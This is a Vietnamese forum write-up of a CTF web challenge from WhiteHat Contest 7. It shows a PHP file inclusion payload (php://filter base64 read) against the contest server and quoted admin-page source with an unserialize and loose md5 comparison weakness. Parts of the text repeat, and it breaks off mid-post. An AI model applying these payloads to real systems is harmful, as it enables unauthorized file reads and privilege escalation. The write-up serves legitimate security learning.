[WriteUp] WhiteHat Contest lần 7
WEB 400 :
Ta thấy đường link đến about có chút khác biệt so với index và regiser, có thể đây là hint cho file inclusion vulnerability
Tham khảo tại đây :
Ta có thể đọc được source của các file trên server (base64 encoded):
Khi view source file about.php, để ý thấy có 1 dòng comment nhìn khá giống base64 encode. Bạn nào giải được challenge crypto ở WH #6 thì chắc nhận ra đây là base32 encode. Decode ra ta được 4dm1n_l0g1n_1.php.
Truy cập vào http://123.30.245.77/4dm1n_l0g1n_1.php thì được yêu cầu nhập groupcode. Thử nhập bừa thì server quăng về 1 câu rất phũ "Noob" =="
View source file này, ta để ý có đoạn:
và
Ta thấy đường link đến about có chút khác biệt so với index và regiser, có thể đây là hint cho file inclusion vulnerability
Mã:
http://123.30.245.77/index.php?field=about.php
Mã:
http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
Mã:
http://123.30.245.77/index.php?field=php://filter/read=convert.base64-encode/resource=index.php
Truy cập vào http://123.30.245.77/4dm1n_l0g1n_1.php thì được yêu cầu nhập groupcode. Thử nhập bừa thì server quăng về 1 câu rất phũ "Noob" =="
View source file này, ta để ý có đoạn:
Mã:
if(isset($_SESSION['username']) and isset($_POST["groupCode"]) and isset($_POST["data"])){
include ('key/secretK3y.php');
$groupCode = $_POST["groupCode"];
@$data = unserialize($_POST["data"]);
if ($data == md5($secret)){
$db_username="user7";
$db_password="user7";
$database="whitehat_ctf";
$username = $_SESSION['username'];
@$con=mysqli_connect('127.0.0.1', $db_username, $db_password, $database) or die("Unable to connect database");
@$query = mysqli_query($con, "UPDATE users SET role=1 WHERE username='$username'") or die("Error on database");
mysqli_close($con);
$fa=1;
}
else
$fa=2;
}
và
Mã:
Chỉnh sửa lần cuối bởi người điều hành: